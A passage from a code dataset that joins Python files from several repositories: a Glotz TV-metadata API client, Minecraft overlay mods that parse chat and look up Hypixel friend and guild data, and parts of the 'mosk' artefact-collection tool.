os.path.join(self.checkpointDir, 'checkpoint.pt'))
def validate(self, student, dataloader, objective, OneHot=False):
"""
Validate student model on all data in dataloader.
:return: dict, named metrics for logging.
"""
student.eval()
device = next(student.parameters()).device
accuracy = Accuracy(OH=OneHot)
lossMeter = AverageMeter()
accMeter = AverageMeter()
for _, (data, target) in enumerate(dataloader):
data, target = data.to(device), target.to(device)
with torch.no_grad():
# Calculate logits
sLogits = student(data)
# Calculate loss
batchLoss = objective(nn.functional.log_softmax(sLogits, dim=1), target)
# Save metrics
lossMeter.update(batchLoss.item(), n=len(data))
accMeter.update(accuracy(nn.functional.softmax(sLogits, dim=1), target), n=len(data))
return {'Valid/Loss': lossMeter.avg,
'Valid/Accuracy': accMeter.avg}
``` |
{
"source": "3OW/pyglotz",
"score": 2
} |
#### File: pyglotz/pyglotz/glotz.py
```python
from __future__ import unicode_literals
import re
import requests
from requests.adapters import HTTPAdapter
from requests.utils import requote_uri
from urllib3.util.retry import Retry
from pyglotz import endpoints
from pyglotz.exceptions import (ActorNotFound, BadRequest, BannersNotFound, ConnectionError, EpisodeNotFound,
IDNotFound, MissingParameters, ShowIndexError, ShowNotFound)
class Show(object):
def __init__(self, data):
self.id = data.get('Series').get('id')
# actors = str.split(data.get('Series').get('Actors'),'|')[1:-1]
self.actors = data.get('Series').get('Actors')
self.airs_day_of_week = data.get('Series').get('Airs_DayOfWeek')
self.airs_time = data.get('Series').get('Airs_Time')
self.content_rating = data.get('Series').get('ContentRating')
self.first_aired = data.get('Series').get('FirstAired')
self.genre = data.get('Series').get('Genre')
self.imdb_id = data.get('Series').get('IMDB_ID')
self.language = data.get('Series').get('Language')
self.network = data.get('Series').get('Network')
self.network_id = data.get('Series').get('NetworkID')
self.overview = data.get('Series').get('Overview')
self.rating = data.get('Series').get('Rating')
self.rating_count = data.get('Series').get('RatingCount')
self.runtime = data.get('Series').get('Runtime')
self.series_id = data.get('Series').get('SeriesID')
self.series_name = data.get('Series').get('SeriesName')
self.status = data.get('Series').get('Status')
self.added = data.get('Series').get('added')
self.added_by = data.get('Series').get('addedBy')
self.banner = data.get('Series').get('banner')
self.fan_art = data.get('Series').get('fanart')
self.last_updated = data.get('Series').get('lastupdated')
self.poster = data.get('Series').get('poster')
self.zap2it_id = data.get('Series').get('zap2it_id')
self.slug = data.get('Series').get('slug')
self.tvrage_id = data.get('Series').get('tvrage_id')
self.year = data.get('Series').get('year')
self.episodes = list()
if data.get('Episode'):
for ep in data.get('Episode'):
self.episodes.append(Episode(ep))
self.aliases = list()
def __repr__(self):
if self.year:
year = str(self.year)
elif self.first_aired:
year = str(self.first_aired[:4])
else:
year = None
return _valid_encoding('<Show(id={id},name={name},year={year})>'.format(
id=self.id,
name=self.series_name,
year=year)
)
def __str__(self):
return _valid_encoding(self.series_name)
def __unicode__(self):
return self.series_name
# Python 3 bool evaluation
def __bool__(self):
return bool(self.id)
    def __getitem__(self, item):
        try:
            return self.episodes[item]
        except IndexError:
            raise EpisodeNotFound('Episode {0} does not exist for show {1}.'.format(item, self.series_name))
class Episode(object):
def __init__(self, data):
self.id = data.get('id')
self.imdb_id = data.get('IMDB_ID')
self.combined_episodenumber = data.get('Combined_episodenumber')
self.combined_season = data.get('Combined_season')
        self.dvd_chapter = data.get('DVD_chapter')
self.dvd_discid = data.get('DVD_discid')
self.dvd_episodenumber = data.get('DVD_episodenumber')
self.dvd_season = data.get('DVD_season')
self.director = data.get('Director')
self.ep_img_flag = data.get('EpImgFlag')
self.episode_name = data.get('EpisodeName')
self.episode_number = data.get('EpisodeNumber')
self.first_aired = data.get('FirstAired')
self.guest_stars = data.get('GuestStars')
self.language = data.get('Language')
self.overview = data.get('Overview')
self.production_code = data.get('ProductionCode')
self.rating = data.get('Rating')
self.rating_count = data.get('RatingCount')
self.season_number = data.get('SeasonNumber')
self.writer = data.get('Writer')
self.absolute_number = data.get('absolute_number')
if self.absolute_number == '':
self.absolute_number = None
self.filename = data.get('filename')
self.last_updated = data.get('lastupdated')
self.season_id = data.get('seasonid')
self.series_id = data.get('seriesid')
self.thumb_added = data.get('thumb_added')
self.thumb_height = data.get('thumb_height')
self.thumb_width = data.get('thumb_width')
def __repr__(self):
return '<Episode(season={season},episode_number={number})>'.format(
season=str(self.season_number).zfill(2),
number=str(self.episode_number).zfill(2)
)
def __str__(self):
season = 'S' + str(self.season_number).zfill(2)
episode = 'E' + str(self.episode_number).zfill(2)
return _valid_encoding(season + episode + ' ' + self.episode_name)
def is_special(self):
if self.season_number == '0':
return True
return False
def _valid_encoding(text):
if not text:
return
return text
def _url_quote(show):
return requote_uri(show)
def _remove_tags(text):
if not text:
return None
return re.sub(r'<.*?>', '', text)
class Actor(object):
def __init__(self, data):
self.id = data.get('id')
self.name = data.get('Name')
self.image = data.get('Image')
self.role = data.get('Role')
self.sort_order = data.get('SortOrder')
def __repr__(self):
        return _valid_encoding('<Actor(name={name},id={id})>'.format(
name=self.name,
id=self.id
))
def __str__(self):
return _valid_encoding(self.name)
def __unicode__(self):
return self.name
class Banner(object):
def __init__(self, data):
self.id = data.get('id')
self.banner_path = data.get('BannerPath')
self.banner_type = data.get('BannerType')
self.banner_type2 = data.get('BannerType2')
self.colors = data.get('Colors')
self.series_name = data.get('SeriesName')
self.thumbnail_path = data.get('ThumbnailPath')
self.vignette_path = data.get('VignettePath')
self.language = data.get('Language')
self.season = data.get('Season')
self.rating = data.get('Rating')
self.rating_count = data.get('RatingCount')
def __repr__(self):
        return _valid_encoding('<Banner(banner_type={banner_type},id={id})>'.format(
banner_type=self.banner_type,
id=self.id
))
def __str__(self):
return _valid_encoding(self.id)
def __unicode__(self):
return self.id
class Glotz(object):
"""This is the main class of the module enabling interaction with the Glotz API.
Attributes:
api_key (str): Glotz api key. Find your key at https://www.glotz.info/profile
"""
def __init__(self, api_key=None, session=None):
self.api_key = api_key
self.session = session or requests.Session()
self.session.headers.setdefault('user-agent', 'glotz_api/{}.{}.{}'.format(1, 0, 0))
# Query Glotz endpoints
def _endpoint_get(self, url):
retries = Retry(total=5,
backoff_factor=0.1,
status_forcelist=[429])
self.session.mount('https://', HTTPAdapter(max_retries=retries))
try:
r = self.session.get(url)
except requests.exceptions.ConnectionError as e:
raise ConnectionError(repr(e))
if r.status_code in [404, 422]:
return None
if r.status_code == 400:
raise BadRequest('Bad Request for url {}'.format(url))
results = r.json()
return results
# Get Show object by tvdb_id
# TODO extend by additional qualifiers
def get_show(self, tvdb_id=None, language=None):
"""Get Show object directly via id.
Args:
tvdb_id: Show tvdb_id
language: Show information language
"""
        if not tvdb_id:
            raise MissingParameters(
                'tvdb_id required to get show, none provided.')
        if not language:
            language = 'de'
        try:
            return self.lookup_tvdb(tvdb_id, language)
        except IDNotFound:
            raise IDNotFound('Show with ID {0} not found'.format(tvdb_id))
# Return list of Show objects
def get_show_list(self, show_name, language=None):
"""Return list of Show objects from the Glotz "Show Search" endpoint.
:param show_name: Name of show
:param language: Language of the show
:return: List of Show(s)
"""
if not language:
language = 'de'
shows = self.show_search(show_name, language)
return shows
def show_search(self, show, language=None):
_show = _url_quote(show)
if not language:
language = 'de'
url = endpoints.show_search.format(_show, language)
q = self._endpoint_get(url)
if q and q.get('Data'):
shows = []
for result in q.get('Data').get('Series') if isinstance(q.get('Data').get('Series'),
list) else [q.get('Data').get('Series')]:
show = Show({'Series': result})
shows.append(show)
return shows
else:
raise ShowNotFound('Show {0} not found'.format(show))
# currently not used by Medusa API
def episode_by_id(self, episode_id, language=None):
if not language:
language = 'de'
url = endpoints.episode_by_id.format(self.api_key, episode_id, language)
q = self._endpoint_get(url)
if q and q.get('Data') and q.get('Data').get('Episode') and q.get('Data').get('Episode').get('id') != '0':
return Episode(q.get('Data').get('Episode'))
else:
raise EpisodeNotFound("Couldn't find Episode with ID {0}".format(episode_id))
def lookup_tvdb(self, tvdb_id, language=None):
if not language:
language = 'de'
url = endpoints.lookup_tvdb.format(self.api_key, tvdb_id, language)
q = self._endpoint_get(url)
if q and q.get('Data') and q.get('Data').get('Series') and q.get('Data').get('Series').get('id') != '0':
return Show(q.get('Data'))
else:
raise IDNotFound('TVDB ID {0} not found'.format(tvdb_id))
# Get all aliases of a show
def get_show_aliases(self, tvdb_id):
url = endpoints.show_aliases.format(tvdb_id)
q = self._endpoint_get(url)
if q:
if str(tvdb_id) in q:
embedded = q[str(tvdb_id)]
if embedded:
aliases = list()
for alias in embedded:
aliases.append(alias)
return aliases
else:
return '[]'
# Get all actors of a show
def get_actors_list(self, tvdb_id):
url = endpoints.show_actors.format(self.api_key, tvdb_id)
q = self._endpoint_get(url)
if q and q.get('Actors') != '':
actors = []
for result in q.get('Actors').get('Actor') if isinstance(q.get('Actors').get('Actor'),
list) else [q.get('Actors').get('Actor')]:
actor = Actor(result)
actors.append(actor)
return actors
else:
raise ActorNotFound('Actors for show {0} not found'.format(tvdb_id))
def get_banners(self, tvdb_id):
url = endpoints.show_banners.format(self.api_key, tvdb_id)
q = self._endpoint_get(url)
if q and q.get('Banners') != '':
banners = []
for result in q.get('Banners').get('Banner') if isinstance(q.get('Banners').get('Banner'),
list) else [q.get('Banners').get('Banner')]:
banner = Banner(result)
banners.append(banner)
return banners
else:
raise BannersNotFound('Banners for show {0} not found'.format(tvdb_id))
def get_show_updates(self, timestamp):
url = endpoints.show_updates.format(self.api_key, timestamp)
q = self._endpoint_get(url)
if q:
if q.get('shows'):
return q.get('shows')
else:
return '[]'
else:
raise ShowIndexError('Error getting show updates, www.glotz.info may be down')
``` |
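A hypothetical end-to-end usage sketch; the API key below is a placeholder, and the calls require network access to the Glotz service:
```python
from pyglotz import Glotz

client = Glotz(api_key='0123456789abcdef')  # placeholder key, not a real credential
shows = client.get_show_list('Tatort', language='de')
for show in shows:
    print(repr(show))   # e.g. <Show(id=...,name=Tatort,year=...)>
```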
{
"source": "3p0bleedthemoncrip/Tobify-Overlay-Download",
"score": 3
} |
#### File: Mods/Chatpp/Mod.py
```python
class MOD:
def __init__(self, Globals):
""" This adds additional message categories to the player detection algorithm """
# data transfer variables
self.Globals = Globals
self.G = self.Globals
self.ModData = Globals.ModData["Chatpp"]
self.backend = Globals.ui_backend
self.frontend = Globals.ui_frontend
# set mod data
self.ModData.name = "Chatpp"
self.ModData.version = "0.0.1"
self.ModData.config = {
"chat++-hypixel": True,
"chat++-bedwars practice": False,
}
self.ModData.settings = {
"chat++-hypixel": "Optimise for Hypixel", # config name : displayed name
"chat++-bedwars practice": "Optimise for the Bedwars Practice server", # config name : displayed name
}
self.ModData.scopes = {
"init": self.setup, # this is part of the setup for the backend ui
"config-init": self.ModData.config, # this is a dictionary of all config items which the mod uses
"config-settings": self.ModData.name, # this registers the mod for the settings menu
"on-message": self.on_message, # this is called when a chat message appears
}
def setup(self, frontend, backend):
""" This is the mod setup function """
join_fragment = "\n - "
print(
f"{self.ModData.name} {self.ModData.version} has been loaded with scopes:{join_fragment}{join_fragment.join([scope for scope in self.ModData.scopes.keys()])}",
end="\n\n")
self.frontend = frontend
self.backend = backend
def on_message(self, timestamp, message):
""" This processes a message """
# print(f"{timestamp} : '{message}'")
# Hypixel
if self.G.config["chat++-hypixel"]:
pass
# Bedwars practice
ranks = ["[Master]", "[Adept]", "[Trainee]"]
if self.G.config["chat++-bedwars practice"]:
# ranked users
for rank in ranks:
if f"{rank} " in message:
message = message.split(f"{rank} ")[1]
username = message.split(" ")[0]
self.add_user(username)
# void message
if " was hit into the void by " in message:
if message.endswith(" FINAL KILL!"):
username1 = message.split(" ")[0]
username2 = message.split(" ")[-3]
else:
username1, *_, username2 = message.split(" ")
self.add_user(username1)
self.add_user(username2)
# void message
elif message.endswith(" fell into the void."):
username = message.split(" ")[0]
self.add_user(username)
# lives remaining
elif " has " in message and " lives" in message:
username, *_ = message.split(" ")
self.add_user(username)
# elimination
elif " has been eliminated" in message:
username, *_ = message.split(" ")
self.sub_user(username)
# server join message
elif " has joined!" in message:
*_, username, _, _ = message.split(" ")
self.add_user(username)
# server leave message
elif " has left!" in message:
*_, username, _, _ = message.split(" ")
self.sub_user(username)
# game leave message
elif message.endswith(" has left the game!"):
username = message.split(" ")[0]
self.add_user(username)
# game start (connecting to lobby)
elif message.startswith("Connecting to "):
self.G.lobby_players = []
# game start (connection successful)
elif message.startswith("Successfully connected to "):
self.G.lobby_players = []
# sending to lobby
elif message.startswith("Sending you to "):
self.G.lobby_players = []
# remove "at"
elif message == "Join the discord for more info at: ":
self.sub_user("at")
# players in game
elif message.startswith("Players in this game: "):
players = message.split(": ")[-1].split(" ")
for player in players:
self.add_user(player)
# block sumo: gold block
elif message.endswith(" has been on the centre gold block for 5 seconds!"):
username = message.split(" ")[0]
self.add_user(username)
# bedwars
elif message.startswith("BED DESTRUCTION > ") and " was dismantled by " in message:
username = message.split(" ")[-1]
self.add_user(username)
# else:
# for p in self.G.lobby_players:
# if p in message:
# print(f"{timestamp} : '{message}'")
def add_user(self, username):
""" This adds a username to the player list """
if username not in self.G.lobby_players:
self.G.lobby_players.append(username)
def sub_user(self, username):
""" This removes a username from the player list """
if username in self.G.lobby_players:
# remove player
self.G.lobby_players.remove(username)
# run mod actions
self.G.thread_chat_ctx.mod_on_player_leave(username)
```
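The string handling in `on_message` can be exercised in isolation; a small standalone sketch of the void-hit branch (the chat line below is made up for illustration):
```python
message = "Steve was hit into the void by Alex"
if " was hit into the void by " in message:
    if message.endswith(" FINAL KILL!"):
        victim = message.split(" ")[0]
        attacker = message.split(" ")[-3]
    else:
        # unpack the first and last whitespace-separated tokens
        victim, *_, attacker = message.split(" ")
    print(victim, attacker)   # Steve Alex
```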
#### File: Mods/PartyInfo/Mod.py
```python
from functools import lru_cache
class MOD:
def __init__(self, Globals):
""" This is an example mod """
# data transfer variables
self.Globals = Globals
self.G = self.Globals
self.ModData = Globals.ModData["PartyInfo"]
self.backend = Globals.ui_backend
self.frontend = Globals.ui_frontend
# set mod data
self.ModData.name = "PartyInfo"
self.ModData.version = "0.1.0"
self.ModData.config = {
"party-info-active": False,
"party-info-friends": True,
"party-info-guild": True,
"party-info-levex-adjustment": False,
"party-info-text-colour": False,
"party-info-party-colour": True,
}
self.ModData.settings = {
"party-info-active": "Get party info",
"party-info-friends": "Use friend data",
"party-info-guild": "Use guild data",
"party-info-levex-adjustment": "Adjust levex",
"party-info-text-colour": "Custom player colours",
"party-info-party-colour": "Highlight team colour",
}
self.ModData.headings = {
"party-id": "Party",
}
self.ModData.custom_heading_colours = {
"party-id": self.get_table_colour
}
self.ModData.scopes = {
"init": self.setup, # this is part of the setup for the backend ui
# "update-f": self.updatef, # this is part of the main update loop for the frontend ui
"config-init": self.ModData.config, # this is a dictionary of all config items which the mod uses
"config-settings": self.ModData.name, # this registers the mod for the settings menu
"table-headings": self.ModData.headings, # this contains any additional table headings
"table-heading-colours": self.ModData.custom_heading_colours, # this replaces the default colour picker
"on-stat-lookup": self.on_stat_lookup, # this is called when stats have been requested for a player
"order-colour": self.order_colour, # this determines output colour
}
def setup(self, frontend, backend):
""" This is the mod setup function """
join_fragment = "\n - "
print(
f"{self.ModData.name} {self.ModData.version} has been loaded with scopes:{join_fragment}{join_fragment.join([scope for scope in self.ModData.scopes.keys()])}",
end="\n\n")
self.frontend = frontend
self.backend = backend
def on_stat_lookup(self, stat_loop_thread, existing_stats, hypixel_data):
""" This adds additional data to the stats """
# add party data
if self.G.config["party-info-active"]:
# if not in your party
existing_stats["party-id"] = ""
# get the friends
friends = self.get_friends(stat_loop_thread, existing_stats)
# get the guild members
guild_members = self.get_guild_members(stat_loop_thread, existing_stats)
# combine (without duplicates)
related_players = list(set(guild_members + friends))
# store in stats
existing_stats["party-info-related-players"] = related_players
# calculate party levex
party_levex = 0
# check for related player in player stats
players_to_tag = []
taken_tags = []
for i, player_stats in enumerate(self.G.gplayer_stats):
# get the uuid
if player_stats["uuid"] in related_players:
players_to_tag.append(i)
# party tag
if player_stats["party-id"] not in taken_tags:
taken_tags.append(player_stats["party-id"])
# get next available party
next_available_party = 1
while next_available_party in taken_tags:
next_available_party += 1
# if there are players to tag then add them to the party
extra_players = []
if len(players_to_tag) != 0:
# tag all players found
for player_pos in players_to_tag:
# add the tag to any players tagged as being in that player's party
existing_party = self.G.gplayer_stats[player_pos]["party-id"]
if existing_party != 0 and existing_party != "":
for i, player_stats in enumerate(self.G.gplayer_stats):
if player_stats["party-id"] == existing_party:
# tag the player
if player_stats["display-name"].lower() in self.G.config["Party"].lower() or \
player_stats[
"nick-name"].lower() in self.G.config["Party"].lower() or player_stats[
"display-name"].lower() == \
self.G.config["Username"].lower():
# in your party
player_stats["party-id"] = "PARTY"
else:
player_stats["party-id"] = next_available_party
# add to players
extra_players.append(i)
# get the levex
party_levex += player_stats["bw-overall-levex"]
# add tag
if self.G.gplayer_stats[player_pos]["display-name"] in self.G.config["Party"] or \
self.G.gplayer_stats[player_pos]["nick-name"] in \
self.G.config["Party"] or self.G.gplayer_stats[player_pos]["display-name"] == self.G.config[
"Username"]:
# in your party
self.G.gplayer_stats[player_pos]["party-id"] = "PARTY"
else:
self.G.gplayer_stats[player_pos]["party-id"] = next_available_party
# get levex
party_levex += self.G.gplayer_stats[player_pos]["bw-overall-levex"]
# tag the new player
if existing_stats["display-name"].lower() in self.G.config["Party"].lower() or existing_stats[
"nick-name"].lower() in \
self.G.config["Party"].lower() or existing_stats["display-name"].lower() == self.G.config[
"Username"].lower():
# in your party
existing_stats["party-id"] = "PARTY"
else:
existing_stats["party-id"] = next_available_party
# get the new player's levex
party_levex += existing_stats["bw-overall-levex"]
# add to players to tag
players_to_tag += extra_players
players_to_tag = list(set(players_to_tag))
# save new levex
if len(players_to_tag) != 0 and self.G.config["party-info-levex-adjustment"]:
# modify levex
party_levex = int(party_levex / (len(players_to_tag) + 1))
# adjust all players
for player_pos in players_to_tag:
self.G.gplayer_stats[player_pos]["bw-overall-levex"] = party_levex
# adjust new player
existing_stats["bw-overall-levex"] = party_levex
else:
# add an empty tag
existing_stats["party-id"] = ""
# is it me?
if (self.G.config["Username"].lower() == existing_stats["display-name"].lower() or self.G.config["Username"] ==
existing_stats["nick-name"].lower()) and self.G.config["Party"] != "":
existing_stats["party-id"] = "PARTY"
# return the updated stats
return existing_stats
def get_guild_members(self, stat_loop_thread, existing_stats):
""" This returns a list of all guild members of a player """
        # should guild data be retrieved
if not self.G.config["party-info-guild"]:
return []
        # get guild data
guild_members = stat_loop_thread.HypixelApiCall(
f"https://api.hypixel.net/guild?key={self.G.config['hypixel_api_key']}&player={existing_stats['uuid']}").json()
# check successful
if guild_members["success"]:
# simplify into a list of guild members
guild_members = self.get_guild_uuids(existing_stats["uuid"], guild_members)
else:
# nothing
guild_members = []
return guild_members
def get_guild_uuids(self, user, guild_data):
""" This returns a list of uuids for the friends of the given user """
# no guild?
if guild_data["guild"] is None:
return []
# get guild members
guild_list = []
for data in guild_data["guild"]["members"]:
if data["uuid"] != user:
guild_list.append(data["uuid"])
return guild_list
def get_friends(self, stat_loop_thread, existing_stats):
""" This returns a list of all friends of a player """
# should friends be retrieved
if not self.G.config["party-info-friends"]:
return []
# get friends
friends = stat_loop_thread.HypixelApiCall(
f"https://api.hypixel.net/friends?key={self.G.config['hypixel_api_key']}&uuid={existing_stats['uuid']}").json()
# check successful
if friends["success"]:
# simplify into a list of friends
friends = self.get_friend_uuids(existing_stats["uuid"], friends)
else:
# nothing
friends = []
return friends
def get_friend_uuids(self, user, friend_data):
""" This returns a list of uuids for the friends of the given user """
friend_list = []
for data in friend_data["records"]:
if data["uuidSender"] == user:
friend_list.append(data["uuidReceiver"])
else:
friend_list.append(data["uuidSender"])
return friend_list
def order_colour(self, num):
""" This determines colour coding """
# should it return a colour
if self.G.config["party-info-text-colour"]:
return self.get_custom_player_colour(num)
else:
return None
@lru_cache(maxsize=32)
def get_custom_player_colour(self, num):
""" This calculates the player colour """
# team colours
if num == "PARTY":
# gold
return "#C9BE0B"
elif num == 1:
# red
return "#FF5733"
elif num == 2:
# blue
return "#334DFF"
elif num == 3:
# green
return "#34FF33"
elif num == 4:
# yellow
return "#F4FF33"
elif num == 5:
# aqua
return "#33FFFE"
elif num == 6:
# white
return "#FFFFFF"
elif num == 7:
# pink
return "#FD33FF"
elif num == 8:
# gray
return "#616161"
else:
# purple
return "#9A69F9"
def get_table_colour(self, pos):
""" This returns the colour for the player in the table at the position given """
return self.get_custom_player_colour(self.frontend.player_stats[pos]["party-id"])
``` |
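The friend-flattening logic in `get_friend_uuids` is easy to check standalone; the records below only mimic the shape of the data consumed above:
```python
user = "uuid-me"
records = [
    {"uuidSender": "uuid-me", "uuidReceiver": "uuid-a"},
    {"uuidSender": "uuid-b", "uuidReceiver": "uuid-me"},
]
# For each friend record, keep whichever side is not the user itself.
friends = [r["uuidReceiver"] if r["uuidSender"] == user else r["uuidSender"]
           for r in records]
print(friends)   # ['uuid-a', 'uuid-b']
```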
{
"source": "3Peso/mosk",
"score": 2
} |
#### File: artefact/localhost/tools.py
```python
__author__ = '3Peso'
from os import path
from baseclasses.artefact import MacArtefact
from businesslogic.support import run_terminal_command
from businesslogic.errors import CollectorParameterError
from baseclasses.artefact import FileClass, ToolClass
class PLUtil(MacArtefact, FileClass, ToolClass):
"""Uses the tool 'PLUtil' to collect information from plist files.
This is a macOS specific tool.
"""
def __init__(self, *args, **kwargs) -> None:
self._tool_path = ""
self._default_tool = "plutil" # The _default_tool attribute is used inside ToolClass
super().__init__(*args, **kwargs)
def _collect(self) -> None:
try:
if not path.exists(self.source_path):
self.data = f"File '{self.source_path}' does not exist."
return
        except AttributeError:
            raise CollectorParameterError("No 'filepath' parameter provided.")
plutil_path = self.tool_path
self.data = run_terminal_command([plutil_path, '-p', self.source_path])
self.data[-1].sourcepath = self.source_path
if plutil_path == 'plutil':
self.data = \
"WARNING: No own copy of 'PLUtil' provided. 'PLUtil' of the live artefact has been used."
```
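A hypothetical macOS-only usage sketch, assuming the mosk package layout and an existing plist file (the path below is illustrative, and `source_path` is normally supplied via collector parameters):
```python
from artefact.localhost.tools import PLUtil

collector = PLUtil(parent=None, parameters={})
collector.source_path = '~/Library/Preferences/com.apple.dock.plist'
collector._collect()
print(collector.data[-1].collecteddata)
```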
#### File: artefact/network/internet.py
```python
__author__ = '3Peso'
import http.client
import json
import logging
import re
from logging import Logger
from urllib.request import urlopen
from urllib.error import HTTPError
from urllib.error import URLError
from urllib.parse import urlparse
from bs4 import BeautifulSoup
from collections import UserDict
from baseclasses.artefact import ArtefactBase
from businesslogic.errors import ApiKeyFormatError, ApiKeyNotSetError
class TemperatureFromOpenWeatherDotCom(ArtefactBase):
"""
Retrieves the current temperature from OpenWeather.com.
You need to provide the citiy, country code, and a valid API key, which you can get from
OpenWeather.com.
"""
def __init__(self, *args, **kwargs) -> None:
self._apikey: str = ""
super().__init__(*args, **kwargs)
self.__url: str = "https://api.openweathermap.org/data/2.5/weather"
self.__querytemplate: str = "{}?q={},{}&units=Metric&&APPID={}"
def _collect(self) -> None:
try:
queryurl = self._get_query()
except AttributeError as attr_err:
self.data = f"Could not load query. Error: '{str(attr_err)}'."
else:
try:
weather_data = urlopen(queryurl)
except HTTPError as httperror:
self.data = f"Could not query {queryurl}.\n{httperror.info}"
except URLError as urlerr:
self.data = f"Could not query {queryurl}.\n{str(urlerr)}"
else:
if self._weather_data_is_valid(weather_data):
data = json.load(weather_data)
self.data = f"Current temperature in {self.city}: {data['main']['temp']} °C"
else:
self.data = f"'{queryurl}' returned invalid weather data."
# REMARKS: Revisit this method. Only checking for the status code is no real help, I think.
@staticmethod
def _weather_data_is_valid(weather_data: http.client.HTTPResponse) -> bool:
logger: Logger = logging.getLogger(__name__)
if weather_data.getcode() == 200:
return True
else:
logger.warning(f"HTTPResponse code for queryied weather data was '{weather_data.getcode()}'. "
f"Status code 200 is a requirement.")
return False
def _get_query(self) -> str:
return self.__querytemplate.format(self.__url, self.city, self.countrycode, self.apikey)
    def _get_parameters_for_str(self) -> dict:
        """Overwrite the default to prevent logging of the API key."""
        filtered: dict = {}
        for itemname, itemvalue in self._parameters.items():
            if itemname != 'apikey':
                filtered[itemname] = itemvalue
        return filtered
@property
def apikey(self) -> str:
if self._apikey == "":
raise ApiKeyNotSetError("apikey not set.")
else:
return self._apikey
@apikey.setter
def apikey(self, value: str) -> None:
if self._validate_api_key(value):
self._apikey = value
else:
raise ApiKeyFormatError(f"Provided api key '{value}' does not match the valid format.")
@staticmethod
def _validate_api_key(apikey) -> bool:
valid_apikey_expression = re.compile('^[a-z0-9]{32}$')
return valid_apikey_expression.match(apikey)
class ExternalLinksOnUrl(ArtefactBase):
"""
Retrieves all the external links from a provided URL, using BeautifulSoup.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
def __str__(self) -> str:
result: str = ''
if type(self.data[0].collecteddata) is list:
for item in self.data[0].collecteddata:
result += f"{item}\r\n"
else:
result += self.data[0].collecteddata
result += self.data[0].get_metadata_as_str()
return result
def _collect(self) -> None:
self.data = ExternalLinksOnUrl._getexternallinks(self.url)
    @staticmethod
    def _getexternallinks(excludeurl: str) -> list:
        try:
            html = urlopen(excludeurl)
        except HTTPError as httperror:
            # HTTPError is a subclass of URLError, so it must be caught first.
            return f"Cannot request page '{excludeurl}'.\n{httperror.reason}"
        except URLError as urlerror:
            return f"Cannot open url '{excludeurl}'.\n{urlerror.reason}"
        else:
            bs = BeautifulSoup(html, "html.parser")
            parsed_url = urlparse(excludeurl)
            pattern = f"^(http|https)://((?!{parsed_url.netloc}).)*$"
            externallinks = [link['href'] for link in bs.find_all('a', href=re.compile(pattern))
                             if link['href'] is not None]
            return externallinks
```
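Both collectors can be exercised directly; a minimal sketch for the link scraper (requires network access, and the URL is just an example):
```python
from artefact.network.internet import ExternalLinksOnUrl

links = ExternalLinksOnUrl._getexternallinks('https://www.python.org')
if isinstance(links, list):          # on error a message string is returned instead
    for link in links[:5]:
        print(link)
else:
    print(links)
```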
#### File: mosk/businesslogic/errors.py
```python
__author__ = '3Peso'
__all__ = ['MaxDirectoriesReachedError', 'UnknownVersionStringError', 'ApiKeyNotSetError', 'ApiKeyFormatError',
           'PathNotSetError', 'NoCollectorError', 'MD5SupportError', 'NoCountryCodeError', 'NoStringResourcesError',
           'LogFileMaximumReachedError', 'CollectorParameterError', 'GlobalPlaceholderFileError',
           'ImageFileError', 'SignatureMatchError', 'TreePathError']
class MaxDirectoriesReachedError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class UnknownVersionStringError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class ApiKeyNotSetError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class ApiKeyFormatError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class PathNotSetError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class NoCollectorError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class MD5SupportError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class NoStringResourcesError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class NoCountryCodeError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class LogFileMaximumReachedError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class CollectorParameterError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class GlobalPlaceholderFileError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class ImageFileError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class SignatureMatchError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
class TreePathError(Exception):
def __init__(self, message: str) -> None:
super().__init__(message)
```
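These exception types carry no extra state; they exist so callers can catch failures selectively. A sketch of the intended pattern (`check_key` is an illustrative helper, not part of the module):
```python
from businesslogic.errors import ApiKeyFormatError, ApiKeyNotSetError

def check_key(key: str) -> None:
    if not key:
        raise ApiKeyNotSetError("apikey not set.")
    if len(key) != 32:
        raise ApiKeyFormatError(f"Provided api key '{key}' does not match the valid format.")

try:
    check_key("")
except (ApiKeyNotSetError, ApiKeyFormatError) as err:
    print(type(err).__name__, err)
```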
#### File: mosk/businesslogic/support.py
```python
__author__ = '3Peso'
__all__ = ['get_userfolders', 'md5', 'run_terminal_command', 'str_to_bool', 'format_bytes',
'validate_file_signature']
import json
import locale
import logging
import os
import socket
import sys
import time
import struct
import hashlib
import subprocess
from logging import Logger
import chardet
from businesslogic.errors import MD5SupportError, NoStringResourcesError, NoCountryCodeError
REF_TIME_1970 = 2208988800  # NTP-to-Unix epoch offset: seconds between 1900-01-01 and 1970-01-01
DEFAULT_TIME_SERVER = '0.de.pool.ntp.org'
def get_userfolders():
"""
Generator which returns all user folders of the localhost.
ONLY WORKS ON MAC
"""
for f in os.scandir('/Users'):
if f.is_dir():
yield f
# from : https://stackoverflow.com/questions/36500197/python-get-time-from-ntp-server
def get_time(ntpserver: str = DEFAULT_TIME_SERVER):
"""
Retrieves the current time from an NTP server.
:param ntpserver: NTP Server to use. Default is 0.de.pool.ntp.org.
:return: The current time.
"""
client: socket.socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
data = b'\x1b' + 47 * b'\0'
socket_error = None
t = None
try:
client.sendto(data, (ntpserver, 123))
data, address = client.recvfrom(1024)
if data:
t = struct.unpack('!12I', data)[10]
t -= REF_TIME_1970
except socket.gaierror as so_err:
socket_error = so_err
finally:
if client is not None:
client.close()
if socket_error is not None:
raise socket_error
return time.ctime(t)
def str_to_bool(boolstring: str):
"""
Translate a string into a real boolean value.
:param boolstring:
Any string. But original intention was the usage of the strings "False" and "True".
:return:
Returns True for the string "True" and False for the string "False".
Returns True for any nonempty string and False for an empty string or for None.
"""
if isinstance(boolstring, str) or boolstring is None:
if boolstring == 'True':
return True
if boolstring == 'False':
return False
